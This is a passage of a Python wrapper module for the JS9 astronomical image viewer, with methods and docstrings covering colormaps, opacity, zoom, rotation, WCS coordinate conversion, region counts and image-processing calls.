call:
JS9.SetColormap(cmap, [contrast, bias])
calling sequences:
JS9.SetColormap(colormap)
JS9.SetColormap(colormap, contrast, bias)
JS9.SetColormap(colormap, staticOpts)
JS9.SetColormap(contrast, bias)
JS9.SetColormap(staticOpts)
where:
- cmap: colormap name
- contrast: contrast value (range: 0 to 10)
- bias: bias value (range 0 to 1)
- staticOpts: static colormap opts
Set the current colormap, contrast/bias, or both. This call takes one
(colormap), two (contrast, bias) or three (colormap, contrast, bias)
arguments. It also takes the following single arguments:
- rgb: toggle RGB mode
- invert: toggle inversion of the colormap
- reset: reset contrast, bias, and invert values
- staticOpts: opts for a static colormap
The staticOpts argument is an array of parameters to change
in a static colormap. Each parameter can take one of two forms:
- [color, min, max]
- [color, opacity|alpha]
- [color, true|false]
The color parameter must match one of the colors specified when
the static colormap was created. The min and max properties replace
the originally specified min and max values. Specifying a number
between 0 and 1 (inclusive) will change the opacity, while specifying
a number greater than 1 will change the alpha (i.e., opacity * 255).
Specifying true or false will set or unset the active flag for that
color, i.e. it will turn on or off use of that color. When turned off,
the pixels in that range will be transparent. For example:
>>> SetColormap '[["red", 0.5], ["green", true], ["blue", false]]'
sets the opacity of red pixels to 0.5, turns on the green pixels,
and turns off the blue pixels in the currently active static colormap.
"""
return self.send({'cmd': 'SetColormap', 'args': args})
def SaveColormap(self, *args):
"""
Save colormap(s)
calling sequences:
JS9.SaveColormap() # save current colormap to "js9.cmap"
JS9.SaveColormap(fname) # save current colormap to fname
JS9.SaveColormap(cmapArray) # save array of ccmaps to "js9.cmap"
JS9.SaveColormap(fname, cmapArray) # save array of cmaps to fname
where:
- fname: output file name
- cmapArray: optional array of colormap names to save
As shown by the calling sequences above, you can use this routine to
save either the current colormap or a list of colormaps taken from the
specified array. You also can choose to save to a particular filename
or the default "js9.cmap":
>>> # save the current colormap in js9.cmap
>>> JS9.SaveColormap()
>>> # save the current colormap in foo.cmap
>>> JS9.SaveColormap("foo.cmap")
>>> # save the foo1 and foo2 colormaps in js9.cmap
>>> JS9.SaveColormap(["foo1", "foo2"])
>>> # save the user-defined foo1 and foo2 colormaps in foo.cmap
>>> JS9.SaveColormap("foo.cmap", ["foo1", "foo2"])
The colormaps are saved in JSON format. Multiple saved colormaps will
be stored in a JSON array, while a single saved colormap will be saved
at the top level.
Don't forget that the file is saved by the browser, in whatever
location you have set up for downloads.
"""
return self.send({'cmd': 'SaveColormap', 'args': args})
def AddColormap(self, *args):
"""
Add a colormap to JS9
call:
JS9.AddColormap(name, aa|rr,gg,bb|obj|json)
where:
- name: colormap name
- aa: an array containing RGB color triplets
- rr,gg,bb: 3 arrays of vertices specifying color changes
- obj: object containing one of the two colormap definition formats
- json: json string containing one of the colormap definition formats
You can add new colormaps to JS9 using one of two formats. The
first is an array of RGB triplets (i.e. an array of 3-D
arrays), where each triplet defines a color. The elements of
the colormap are divided evenly between these 3-D triplets.
For example, the i8 colormap is defined as:
>>> JS9.AddColormap("i8",
[[0,0,0], [0,1,0], [0,0,1], [0,1,1], [1,0,0],
[1,1,0], [1,0,1], [1,1,1]]))
Here, the colormap is divided into 8 sections having the
following colors: black, green, blue, cyan (green + blue),
red, yellow (red + green), purple (red + blue), and white. A
colormap such as sls also utilizes an array of RGB triplets,
but it has 200 entries, leading to much more gradual
transitions between colors.
The second colormap format consists three arrays of vertices
defining the change in intensity of red, green, and blue,
respectively. For each of these three color triplets, the
first coordinate of each vertex is the x-distance along the
colormap axis (scaled from 0 to 1) and the second coordinate
is the y-intensity of the color. Colors are interpolated
between the vertices. For example, consider the following:
>>> JS9.AddColormap("red",
[[0,0],[1,1]], [[0,0], [0,0]], [[0,0],[0,0]])
>>> JS9.AddColormap("blue",
[[0,0],[0,0]], [[0,0], [0,0]], [[0,0],[1,1]])
>>> JS9.AddColormap("purple",
[[0,0],[1,1]], [[0,0], [0,0]],[[0,0],[1,1]])
In the red (blue) colormap, the red (blue) array contains two
vertices, whose color ranges from no intensity (0) to full
intensity (1) over the whole range of the colormap (0 to
1). The same holds true for the purple colormap, except that
both red and blue change from zero to full intensity.
For a more complicated example, consider the a colormap, which is
defined as:
>>> JS9.AddColormap("a",
[[0,0], [0.25,0], [0.5,1], [1,1]],
[[0,0], [0.25,1], [0.5,0], [0.77,0], [1,1]],
[[0,0], [0.125,0], [0.5, 1], [0.64,0.5],
[0.77, 0], [1,0]])
Here we see that red is absent for the first quarter of the
colormap, then gradually increases to full intensity by the
half mark, after which it stays at full intensity to the
end. Green ramps up to full intensity in the first quarter,
then drops to zero by the half and stays that way until a bit
more than three-quarters along, after which it gradually
increases again. Blue starts off at no intensity for an
eighth, then gradually increases to full intensity by the
half-way mark, decreasing gradually to zero by the
three-quarter mark. The result is that you see, for example,
green at the beginning and yellow (red + green) at the end,
with some purple (red + blue) in the middle of the colormap.
As a convenience, you also can pass an object or json string
containing the colormap definition:
# RGB color triplets for the I8 colormap in a "colors" property
{"name":"i8",
"colors":[[0,0,0],[0,1,0],[0,0,1],[0,1,1],
[1,0,0],[1,1,0],[1,0,1],[1,1,1]]}
# all 3 vertex arrays for purple colormap in one "vertices" property
{"name":"purple",
"vertices":[[[0,0],[1,1]],[[0,0],[0,0]],[[0,0],[1,1]]]}
Finally, note that JS9.AddColormap() adds its new colormap to
all JS9 displays on the given page.
"""
return self.send({'cmd': 'AddColormap', 'args': args})
def LoadColormap(self, *args):
"""
Load a colormap file into JS9
LoadColormap(filename)
where:
- filename: input file name or URL
Load the specified colormap file into the web page. The filename,
which must be specified, can be a local file (with absolute path or a
path relative to the displayed web page) or a URL. It should contain a
JSON representation of a colormap, either in RGB color format or in
vertex format (see AddColormap() above):
>>> # RGB color format
>>> {
>>> "name": "purplish",
>>> "colors": [
>>> [0.196, 0.196, 0.196],
>>> [0.475, 0, 0.608],
>>> [0, 0, 0.785],
>>> [0.373, 0.655, 0.925],
>>> [0, 0.596, 0],
>>> [0, 0.965, 0],
>>> [1, 1, 0],
>>> [1, 0.694, 0],
>>> [1, 0, 0]
>>> ]
>>> }
>>> # vertex format
>>> {
>>> "name": "aips0",
>>> "vertices": [
>>> [
>>> [0.203, 0],
>>> [0.236, 0.245],
>>> [0.282, 0.5],
>>> [0.342, 0.706],
>>> [0.411, 0.882],
>>> [0.497, 1]
>>> ],
>>> [
>>> [0.394, 0],
>>> [0.411, 0.196],
>>> [0.464, 0.48],
>>> [0.526, 0.696],
>>> [0.593, 0.882],
>>> [0.673, 1],
>>> [0.94, 1],
>>> [0.94, 0]
>>> ],
>>> [
>>> [0.091, 0],
>>> [0.091, 0.373],
>>> [0.262, 1],
>>> [0.94, 1],
>>> [0.94, 0]
>>> ] ]
>>> }
As with AddColormap(), the new colormap will be available
in all displays.
"""
return self.send({'cmd': 'LoadColormap', 'args': args})
def GetRGBMode(self, *args):
"""
Get RGB mode information
call:
rgbobj = JS9.GetRGBMode()
returns:
- rgbobj: RGB mode information
This routine returns an object containing the following RGB mode
information:
- active: boolean specifying whether RGB mode is active
- rid: image id of "red" image
- gid: image id of "green" image
- bid: image id of "blue" image
"""
return self.send({'cmd': 'GetRGBMode', 'args': args})
def SetRGBMode(self, *args):
"""
call:
JS9.SetRGBMode(mode, [imobj])
where:
- mode: boolean true to activate RGB mode, false to disable
- imobj: optional object specifying three images to set to the
"red", "green", and "blue" colormaps
In RGB mode, three images assigned the "red", "green", and "blue"
colormaps are displayed as a single image. The RGB color of each
displayed pixel is a combination of the "red", "green", and "blue"
pixel value taken from the appropriate image. Note that all three
images are not required: you can display an RGB image using two of
the three colors simply by not assigning the third colormap.
The SetRGBMode() call turns on or off RGB mode. The
boolean mode argument specifies whether to activate or
de-activate RGB mode. The optional imobj object specifies
(already-loaded) images to assign to the three colormaps:
- rid: image id (or handle) to set to the "red" colormap
- gid: image id (or handle) to set to the "green" colormap
- bid: image id (or handle) to set to the "blue" colormap
If imobj is not specified, it is assumed that images have been
assigned the "red", "green", and "blue" colormaps by another means.
(Once again, it is not necessary to assign all three colormaps.)
"""
return self.send({'cmd': 'SetRGBMode', 'args': args})
def GetOpacity(self, *args):
"""
Get the image opacity
call:
opacity = JS9.GetOpacity()
returns:
- opacity: opacity object
The returned opacity object will contain the following properties:
- opacity: opacity value assigned to image pixels
- flooropacity: opacity assigned when the image pixel value is
less than or equal to the floor value (if defined)
- floorvalue: floor value to test image pixel values against
(if defined)
"""
return self.send({'cmd': 'GetOpacity', 'args': args})
def SetOpacity(self, *args):
"""
Set the image opacity
calling sequences:
JS9.SetOpacity(opacity) # set default opacity for all image pixels
JS9.SetOpacity(fvalue, fopacity) # pixels <= fvalue use fopacity
JS9.SetOpacity(opacity, fvalue, fopacity) # set def and floor opacity
JS9.SetOpacity("reset") # reset default opacity to 1
JS9.SetOpacity("resetfloor") # remove opacity floor
JS9.SetOpacity("resetall") # reset def opacity to 1, remove floor
where:
- opacity: opacity value for image pixels
- floorvalue: floor value to test image pixel values against
- flooropacity: floor opacity value to set
Set the current opacity, floor opacity, or both. This call takes one
(opacity), two (floorvalue, flooropacity) or three (opacity,
floorvalue, flooropacity) arguments.
The floor value & opacity option allows you to set the opacity
for pixels whose image value is less then or equal to a specified
floor value. It takes two arguments: the floor pixel value to check,
and the floor opacity to apply. For example, when both arguments are 0,
pixels whose image values are less than or equal to 0
will be transparent. Specifying 5 and 0.5, respectively, means that
pixels whose image values less than or equal to 5 will have an opacity
of 0.5. A useful case is to make the pixels transparent at a
given value, allowing features of one image to be blended into
another, without blending extraneous pixels.
The various reset options allow you to reset the default value,
floor values, or both.
"""
return self.send({'cmd': 'SetOpacity', 'args': args})
def GetZoom(self, *args):
"""
Get the image zoom factor
call:
zoom = JS9.GetZoom()
returns:
- zoom: floating point zoom factor
"""
return self.send({'cmd': 'GetZoom', 'args': args})
def SetZoom(self, *args):
"""
Set the image zoom factor
call:
JS9.SetZoom(zoom)
where:
- zoom: floating or integer zoom factor or zoom directive string
The zoom directives are:
- x[n]|X[n]: multiply the zoom by n (e.g. 'x2')
- /[n]: divide the zoom by n (e.g. '/2')
- in|In: zoom in by a factor of two
- out|Out: zoom out by a factor of two
- toFit|ToFit: zoom to fit image in display
"""
return self.send({'cmd': 'SetZoom', 'args': args})
def GetPan(self, *args):
"""
Get the image pan position
call:
ipos = JS9.GetPan()
returns:
- ipos: object containing image information for pan
The returned ipos object will contain the following properties:
- x: x image coordinate of center
- y: y image coordinate of center
"""
return self.send({'cmd': 'GetPan', 'args': args})
def SetPan(self, *args):
"""
Set the image pan position
call:
JS9.SetPan(x, y)
where:
- x: x image coordinate
- y: y image coordinate
Set the current pan position using image coordinates. Note that you can
use JS9.WCSToPix() and JS9.PixToWCS() to convert between image
and WCS coordinates.
"""
return self.send({'cmd': 'SetPan', 'args': args})
def AlignPanZoom(self, *args):
"""
Align pan and zoom of the current image to a target image
call:
JS9.AlignPanZoom(im)
where:
- im: image containing the WCS used to perform the alignment
This routine changes the pan and zoom of the current image to match a
target image, assuming both have WCS info available. The image is
panned to the RA, Dec at the center of the target image's display. The
zoom is also matched. The pixel size (as specified by the FITS CDELT1
parameter) will be taken into account when zooming, but not the image
rotation or flip. This routine is faster than ReprojectData() for
aligning reasonably similar images.
No attempt is make to keep the images aligned after the call. This
allows you to make adjustments to the current and/or target images and
then re-align as needed.
"""
return self.send({'cmd': 'AlignPanZoom', 'args': args})
def GetScale(self, *args):
"""
Get the image scale
call:
scale = JS9.GetScale()
returns:
- scale: object containing scale information
The returned scale object will contain the following properties:
- scale: scale name
- scalemin: min value for scaling
- scalemax: max value for scaling
"""
return self.send({'cmd': 'GetScale', 'args': args})
def SetScale(self, *args):
"""
Set the image scale
call:
JS9.SetScale(scale, smin, smax)
where:
- scale: scale name
- smin: scale min value
- smax: scale max value
Set the current scale, min/max, or both. This call takes one (scale),
two (smin, max) or three (scale, smin, smax) arguments.
"""
return self.send({'cmd': 'SetScale', 'args': args})
def GetFlip(self, *args):
"""
Get flip state of an image
call:
flip = JS9.GetFlip()
returns:
- flip: current flip state
Possible returned flip states are: "x", "y", "xy", or "none".
"""
return self.send({'cmd': 'GetFlip', 'args': args})
def SetFlip(self, *args):
"""
Flip an image around the x or y axis
call:
JS9.SetFlip(flip)
where:
- flip: "x", "y"
Flip an image around the specified axis. Flipping is relative to the
current state of the display, so flipping by x twice will return you
to the original orientation.
Since this operation is applied to the entire display canvas instead
of the image, image parameters such as the WCS are not affected.
"""
return self.send({'cmd': 'SetFlip', 'args': args})
def GetRotate(self, *args):
"""
Get the rotate state of an image
call:
flip = JS9.GetRotate()
returns:
- rot: current rotation value for this image
Return the current rotation.
"""
return self.send({'cmd': 'GetRotate', 'args': args})
def SetRotate(self, *args):
"""
Rotate an image by a specified number of degrees
call:
JS9.SetRotate(rot)
where:
- rot: rotation in degrees
Set the rotation of an image to the specified number of degrees. The
rotation is performed in terms of an absolute angle: if you rotate by
20 degrees and then do it again, there is no change. Also, setting the
rotation to 0 sets the angle to 0.
Since this operation is applied to the entire display canvas instead
of the image, image parameters such as the WCS are not affected.
"""
return self.send({'cmd': 'SetRotate', 'args': args})
def GetRot90(self, *args):
"""
Get the rotate state of an image
call:
flip = JS9.GetRot90()
returns:
- rot: current rotation value for this image
The returned rotation value will be a multiple of 90, depending on
how many rotations have been executed and in which direction.
"""
return self.send({'cmd': 'GetRot90', 'args': args})
def SetRot90(self, *args):
"""
Rotate an image by +/- 90 degrees
call:
JS9.SetRot90(rot)
where:
- rot: +/- 90
Rotate an image by a multiple of 90 degrees. Rot90 rotations are
relative to the current state of the display, so four rotations will
return you to the original orientation.
Since this operation is applied to the entire display canvas instead
of the image, image parameters such as the WCS are not affected.
"""
return self.send({'cmd': 'SetRot90', 'args': args})
def GetParam(self, *args):
"""
Get an image parameter value
val = GetParam(param)
where:
- param: name of the parameter
returns:
- val: value of the parameter
Return the value of an image parameter. The available parameters are
listed below in the SetParam() section.
"""
return self.send({'cmd': 'GetParam', 'args': args})
def SetParam(self, *args):
"""
Set an image parameter value
ovalue = SetParam(param, value)
where:
- param: name of the parameter
- val: new value of the parameter
returns:
- ovalue: the previous value of the parameter
A number of miscellaneous image parameters are copied from the
JS9.imageOpts object to each image when it is first loaded. You can
use the SetParam() routine to modify these values subsequently.
The available parameters and their current default values are listed
below:
- exp: 1000, default exp value for scaling
- listonchange: false, list regions after a region change?
- opacity: 1.0, image display opacity, between 0 and 1
- nancolor: "#000000", 6-digit #hex color for NaN values
- valpos: true, display value/position?
- wcsalign: true, align image using wcs after reproj?
- xeqonchange: true, xeq an onchange callback after a region change?
- zscalecontrast: 0.25, default zscale value from ds9
- zscalesamples: 600, default zscale value from ds9
- zscaleline: 120, default zscale value from ds9
The routine returns the previous value of the parameter, which can
be useful when temporarily turning off a function. For example:
>>> oval = SetParam("xeqonchange", false);
>>> .... processing ...
>>> SetParam("xeqonchange", oval);
will temporarily disable execution of the previously defined regions
onload callback, resetting it to the old value after processing
is complete.
"""
return self.send({'cmd': 'SetParam', 'args': args})
def GetValPos(self, *args):
"""
Get value/position information
call:
valpos = JS9.GetValPos(ipos)
where:
- ipos: image position object containing x and y image coord values
returns:
- valpos: value/position object
This routine determines the data value at a given image position and
returns an object containing the following information:
- ix: image x coordinate
- iy: image y coordinate
- isys: image system (i.e. 'image')
- px: physical x coordinate
- py: physical y coordinate
- psys: currently selected pixel-based system (i.e. 'image' or
'physical') for the above px, py values
- ra: ra in degrees (if WCS is available)
- dec: dec in degrees (if WCS is available)
- wcssys: wcs system (if WCS is available)
- val: floating point pixel value
- val3: pixel value as a string truncated to 3 decimal digits
- vstr: string containing value and position info
- id: id of the image
- file: filename of the image
- object: object name of the image from the FITS header
"""
return self.send({'cmd': 'GetValPos', 'args': args})
def PixToWCS(self, *args):
"""
Convert image pixel position to WCS position
call:
wcsobj = JS9.PixToWCS(x, y)
where:
- x: x image coordinate
- y: y image coordinate
returns:
- wcsobj: world coordinate system object
The wcs object contains the following properties:
- ra: right ascension in floating point degrees
- dec: declination in floating point degrees
- sys: current world coordinate system being used
- str: string of wcs in current system ('[ra] [dec] [sys]')
"""
return self.send({'cmd': 'PixToWCS', 'args': args})
def WCSToPix(self, *args):
"""
Convert WCS position to image pixel position
call:
pixobj = JS9.WCSToPix(ra, dec)
where:
- ra: right ascension in floating point degrees
- dec: declination in floating point degrees
returns:
- pixobj: pixel object
The pixel object contains the following properties:
- x: x image coordinate
- y: y image coordinate
- str: string of pixel values ('[x]' '[y]')
"""
return self.send({'cmd': 'WCSToPix', 'args': args})
def ImageToDisplayPos(self, *args):
"""
Get the display coordinates from the image coordinates
call:
dpos = JS9.ImageToDisplayPos(ipos)
where:
- ipos: image position object containing x and y image coordinate
values
returns:
- dpos: display position object containing x and y display
coordinate values
Get display (screen) coordinates from image coordinates. Note that
image coordinates are one-indexed, as per FITS conventions, while
display coordinate are 0-indexed.
"""
return self.send({'cmd': 'ImageToDisplayPos', 'args': args})
def DisplayToImagePos(self, *args):
"""
Get the image coordinates from the display coordinates
call:
ipos = JS9.DisplayToImagePos(dpos)
where:
- dpos: display position object containing x and y display
coordinate values
returns:
- ipos: image position object containing x and y image coordinate
values
Note that image coordinates are one-indexed, as per FITS conventions,
while display coordinate are 0-indexed.
"""
return self.send({'cmd': 'DisplayToImagePos', 'args': args})
def ImageToLogicalPos(self, *args):
"""
Get the logical coordinates from the image coordinates
call:
lpos = JS9.ImageToLogicalPos(ipos, lcs)
where:
- ipos: image position object containing x and y image coordinate
values
returns:
- lpos: logical position object containing x and y logical
coordinate values
Logical coordinate systems include: 'physical' (defined by LTM/LTV
keywords in a FITS header), 'detector' (DTM/DTV keywords), and
'amplifier' (ATM/ATV keywords). Physical coordinates are the most
common. In the world of X-ray astronomy, they refer to the 'zoom 1'
coordinates of the data file.
This routine will convert from image to logical coordinates. By
default, the current logical coordinate system is used. You can specify
a different logical coordinate system (assuming the appropriate
keywords have been defined).
"""
return self.send({'cmd': 'ImageToLogicalPos', 'args': args})
def LogicalToImagePos(self, *args):
"""
Get the image coordinates from the logical coordinates
call:
ipos = JS9.LogicalToImagePos(lpos, lcs)
where:
- lpos: logical position object containing x and y logical
coordinate values
returns:
- ipos: image position object containing x and y image coordinate
values
Logical coordinate systems include: 'physical' (defined by LTM/LTV
keywords in a FITS header), 'detector' (DTM/DTV keywords), and
'amplifier' (ATM/ATV keywords). Physical coordinates are the most
common. In the world of X-ray astronomy, they refer to the 'zoom 1'
coordinates of the data file.
This routine will convert from logical to image coordinates. By
default, the current logical coordinate system is used. You can specify
a different logical coordinate system (assuming the appropriate
keywords have been defined).
"""
return self.send({'cmd': 'LogicalToImagePos', 'args': args})
def GetWCSUnits(self, *args):
"""
Get the current WCS units
call:
unitsstr = JS9.GetWCSUnits()
returns:
- unitstr: 'pixels', 'degrees' or 'sexagesimal'
"""
return self.send({'cmd': 'GetWCSUnits', 'args': args})
def SetWCSUnits(self, *args):
"""
Set the current WCS units
call:
JS9.SetWCSUnits(unitsstr)
where:
- unitstr: 'pixels', 'degrees' or 'sexagesimal'
Set the current WCS units.
"""
return self.send({'cmd': 'SetWCSUnits', 'args': args})
def GetWCSSys(self, *args):
"""
Get the current World Coordinate System
call:
sysstr = JS9.GetWCSSys()
returns:
- sysstr: current World Coordinate System ('FK4', 'FK5', 'ICRS',
'galactic', 'ecliptic', 'image', or 'physical')
"""
return self.send({'cmd': 'GetWCSSys', 'args': args})
def SetWCSSys(self, *args):
"""
Set the current World Coordinate System
call:
JS9.SetWCSSys(sysstr)
where:
- sysstr: World Coordinate System ('FK4', 'FK5', 'ICRS',
'galactic', 'ecliptic', 'image', or 'physical')
Set current WCS system. The WCS systems are available only if WCS
information is contained in the FITS header. Also note that 'physical'
coordinates are the coordinates tied to the original file. They are
mainly used in X-ray astronomy where individually detected photon
events are binned into an image, possibly using a blocking factor. For
optical images, image and physical coordinate usually are identical.
"""
return self.send({'cmd': 'SetWCSSys', 'args': args})
def DisplayMessage(self, *args):
"""
Display a text message
call:
JS9.DisplayMessage(which, text)
where:
- which: "info" or "regions"
- text: text to display
The text string is displayed in the "info" area (usually occupied by the
valpos display) or the "region" area (where regions are displayed). The
empty string will clear the previous message.
"""
return self.send({'cmd': 'DisplayMessage', 'args': args})
def DisplayCoordGrid(self, *args):
"""
Display a WCS-based coordinate grid
call:
JS9.DisplayCoordGrid(mode, opts)
where:
- mode: true (display) or false (hide)
- opts: optional object or json string containing grid parameters
A coordinate grid displays lines of constant RA and constant Dec, with
the points of intersection labeled by their RA and Dec values. The
labels are in sexagesimal notation if the WCS units are sexagesimal,
otherwise they are in degrees. When using sexagesimal notation, labels
will be shortened if possible, e.g., if the RA hours are the same in
two successive labels but the minutes are different, only the minutes
are shown in the second label.
If no arguments are supplied, the routine returns true if the
coordinate grid is currently being displayed, false otherwise. A
boolean first argument specifies whether to display the coordinate
grid or not.
The optional second argument is an opts object (or a json-formatted
string) containing properties to override the default JS9.Grid.opts
properties. These properties include:
- raLines: approx. number of RA grid lines
- decLines: approx. number of Dec grid lines
- stride: fineness of grid lines
- margin: edge margin for displaying a line
- lineColor: color of grid lines
- strokeWidth: grid stroke width
- raAngle: rotation for RA label
- decAngle: rotation for Dec label
- labelColor: color of text labels
- labelFontFamily: label font
- labelFontSize: label font size
- labelRAOffx: x offset of RA labels
- labelRAOffy: y offset of RA labels
- labelDecOffx: x offset of Dec labels
- labelDecOffy: y offset of Dec labels
- degPrec: precision for degree labels
- sexaPrec: precision for sexagesimal labels
- reduceDims: reduce lines of smaller image dim?
- cover: grid lines cover: display or image
The strokeWidth property determines the width of the grid
lines. It also serves as a reminder that you can pass other
standard shape properties in the opts object.
JS9's label placement algorithm puts labels close to the
intersection of RA and Dec lines. A number of properties can be
useful in cases where this simple algorithm is not sufficient:
the raAngle and decAngle properties allow you to rotate the
labels with respect to the grid lines. The four
label[RA,Dec]Off[x,y] properties allow you to move the label with
respect to the grid lines. The raSkip and decSkip properties
allow you to skip labelling the first available lines within the
display. It can be useful, for example, on a rotated image, when
the labels are placed in a corner.
The degPrec and sexaPrec properties specify the precision for
degree values and segagesimal values, respectively. Higher
precision will use more digits and take more space along each line.
A number of properties are (more or less) internal but might be
of use: the reduceDims property will reduce the raLines and
decLines properties by the ratio of image dimensions if one
dimension is smaller than the other. This can prevent crowding in
the smaller dimension. The stride property specifies the length
of each line segment that together make up a grid line. A smaller
stride might make the grid lines smoother in some cases, at the
price of more processing time. The cover property determines
whether the grid is drawn over the entire image or just the
displayed part of the image. At the moment, drawing lines over
the displayed part of the image seems to be sufficient.
Note that you can specify global site-wide values for all these
parameters (overriding the JS9.Grid.opts defaults) by supplying them
in a grid object within the globalOpts object in the js9prefs.js file.
Example: display a coordinate grid, specifying the line color:
>>> JS9.DisplayCoordGrid(true, {lineColor: "pink"});
"""
return self.send({'cmd': 'DisplayCoordGrid', 'args': args})
def CountsInRegions(self, *args):
"""
Get background-subtracted counts in regions
call:
JS9.CountsInRegions(sregion, bregion, opts)
where:
- sregion: source region ("$sregions" for displayed source regions)
- bregion: background region ("$bregions" for displayed bkgd regions)
- opts: optional object or json string containing region parameters
The regcnts program (and its predecessor, funcnts) counts photons in
specified source regions and optionally, in specified background
regions. Displayed results include the bkgd-subtracted counts in each
region, as well as the error on the counts, the area in each region,
and the surface brightness (cnts/area**2) calculated for each region.
Regcnts for desktop use is available on GitHub at:
https://github.com/ericmandel/regions.
The regcnts program has been compiled into JS9 using Emscripten.
Using this routine, regcnts can be run on the FITS memory-based file
for the currently displayed image. The first two arguments specify
the source region(s) and background region(s), respectively.
You can pass a standard region specifier as the source
or background region. If the string "$sregions" ("$bregions") is
specified, the source (background) regions are taken from the
currently displayed image.
In keeping with how desktop regcnts works, if no argument or null or a
null string is specified as the source region, the entire field is
used as the source region. If no argument or null or a null string is
explicitly specified as a background region, no regions are used for
the background. In particular, if you pass only the source region
argument, or pass only the source region and opts arguments, no
background region is used. To recap:
>>> # use entire field, no background
>>> JS9.CountsInRegions([opts])
>>> JS9.CountsInRegions("field"||null||""[, opts])
>>> # use displayed source and displayed background
>>> JS9.CountsInRegions("$sregions", "$bregions"[, opts])
>>> # use displayed source, no background
>>> JS9.CountsInRegions("$sregions"[, opts])
>>> # use displayed source and specified background
>>> JS9.CountsInRegions("$sregions", bregions[, opts])
>>> # use specified source, no background
>>> JS9.CountsInRegions(sregions[, opts])
>>> # use specified source and specified background
>>> JS9.CountsInRegions(sregions, bregions[, opts])
>>> # use specified source and displayed background
>>> JS9.CountsInRegions(sregions, "$bregions"[, opts])
>>> # use entire field and specified background
>>> JS9.CountsInRegions("field"||null||"", bregions[, opts])
>>> # use entire field and displayed background
>>> JS9.CountsInRegions("field"||null||"", "$bregions"[, opts])
The third argument allows you to specify options to regcnts:
- cmdswitches: command line switches passed to regcnts
- dim: size of reduced image (def: max of JS9.globalOpts.image.[xy]dim)
- reduce: reduce image size? (def: true)
- lightwin: if true, results displayed in light window
The command line switches that can be specified in cmdswitches are
detailed in https://js9.si.edu/regions/regcnts.html, the regcnts help
page. Aside from switches which control important aspects of the
analysis, the "-j" switch (which returns the output in JSON format)
might be useful in the browser environment. Some examples:
>>> # display results in a light window
>>> JS9.CountsInRegions({lightwin: true})
>>> # return json using maximum precision in output
>>> JS9.CountsInRegions({cmdswitches: "-j -G"})
Results are also returned as a text string.
The regcnts code is memory (and cpu) intensive. In the desktop
environment, this is not typically a problem, but the
memory-constrained browser environment can present a challenge for
large images and binary tables. To avoid running out of memory (and
for large images, to speed up processing considerably), the
CountsInRegions() routine will bin the image to reduce its size,
unless the reduce option is explicitly set to false. The binned
image size can be specified by the dim option, defaulting to
the global value of the image dimension options. When a file is binned
in this manner, the returned resolution value (e.g., arcsec/pixel)
will reflect the applied binning. Note that the number of photons
found inside a binned and unbinned region differ slightly, due to the
difference in the pixel boundaries in the two cases.
The Counts in Regions option of the Analysis -> Client-side
Analysis menu runs regcnts on the source and background regions of
the currently displayed image. The results are displayed in a light
window.
Finally, note that the main JS9 web site at https://js9.si.edu
also offers regcnts as a server-based analysis program in the
Analysis menu. The displayed source and background regions are passed
to the server for processing. Because this version runs the desktop
program, it runs on the original file and does no binning to reduce
the image size (which, by the way, could lengthen the processing
time). But the server-side task also can be useful for
JS9 large file support, which involves displaying a small
representation file associated with a much larger parent
file stored on the server. In this case, you often want to run
the analysis on the larger (original) file.
"""
return self.send({'cmd': 'CountsInRegions', 'args': args})
def GaussBlurData(self, *args):
"""
Gaussian blur of raw data
call:
JS9.GaussBlurData(sigma, opts)
where:
- sigma: sigma of Gaussian function
- opts: options object
This routine creates a new raw data layer called "gaussBlur"
in which the image pixel values are blurred using a Gaussian
function with the specified sigma. The routine uses the fast
Gaussian blur algorithm (approximating a full Gaussian blur
with three passes of a box blur) described in:
http://blog.ivank.net/fastest-gaussian-blur.html.
"""
return self.send({'cmd': 'GaussBlurData', 'args': args})
def ImarithData(self, *args):
"""
Perform image arithmetic on raw data
call:
JS9.ImarithData(op, arg1, opts)
where:
- op: image operation: "add", "sub", "mul", "div",
"min", "max", "reset"
- arg1: image handle, image id or numeric value
- opts: options object
The JS9.ImarithData() routine performs basic arithmetic
(addition, subtraction, multiplication, division, minimum,
maximum, average) between the currently displayed image and
either another image or a constant value. The first op
argument is a string, as detailed above. The second arg1
argument can be a numeric value or an image id. In the former
case, the constant value is applied to each pixel in the
image. In the latter case, the operation is performed between
the corresponding pixels in the two images. For example:
>>> JS9.ImarithData("max", "foo.fits")
will make a new data layer of the currently displayed image, where
each pixel is the larger value from that image and the foo.fits image
(which can be in any display).
This routine creates a new raw data layer called "imarith"
containing the results of the operation. Successive calls to
this routine are cumulative, so that you can build up a more
complex operation from simple ones. For example:
>>> # foo.fits is displayed in the "myJS9" display
>>> myim = JS9.GetImage()
>>> JS9.ImarithData("max", myim)
>>> JS9.ImarithData("add", 2.718)
will make a new data layer where each pixel is the larger value from
the two images, after which an approximation of the irrational number
e is added to each pixel.
The special reset operation deletes the "imarith" raw data
layer, allowing you to start afresh.
The bitpix value of the new "imarith" layer is chosen as follows:
- for operations between two images, bitpix the "larger" of
the two images (where float is "larger" than int).
- for operations between an image and a constant, bitpix of -32
(single float) is chosen unless the image itself has bitpix of -64, in
which case the double float bitpix is chosen.
You can override the choice of bitpix by passing a bitpix property
in the optional opts object.
Finally, note that the two images must have the same dimensions. We
might be able to remove this restriction in the future, although
it is unclear how one lines up images of different dimensions.
"""
return self.send({'cmd': 'ImarithData', 'args': args})
def ShiftData(self, *args):
"""
Shift raw data
call:
JS9.ShiftData(x, y, opts)
where:
- x: number of pixels to shift in the x (width) direction
- y: number of pixels to shift in the y (height) direction
- opts: options object
This routine creates a new raw data layer called "shift" in which
the pixels are shifted from the original image array by the specified
amount in x and/or y. The results of successive shifts are
cumulative. The routine is used by the Harvard-Smithsonian Center for
Astrophysics MicroObservatory project interactively to align images
that are only slightly offset from one another.
"""
return self.send({'cmd': 'ImarithData', 'args': args})
def FilterRGBImage(self, *args):
"""
Apply a filter to the RGB image
call:
JS9.FilterRGBImage(filter, args)
where:
- filter: name of image filter to apply to the RGB data
- args: filter-specific arguments, where applicable
In JS9, you can change the raw data (and hence the displayed
image) using routines such as JS9.GaussBlurData() or the more
general JS9.RawDataLayer(). You also can apply image
processing techniques directly to the displayed RGB image
without changing the underlying raw data, using this
routine. The web has an overwhelming amount of information
about image processing. A good technical article concerning
the use of image filters with Javascript and the HTML5 canvas
is available at:
http://www.html5rocks.com/en/tutorials/canvas/imagefilters/
The JS9.FilterRGBImage() routine supports a number of image
processing routines, which are listed below. To call one of
them using JS9.FilterRGBImage(), supply the filter name,
followed by any filter-specific arguments, e.g.:
>>> JS9.FilterRGBImage("luminance")
>>> JS9.FilterRGBImage("duotone", "g")
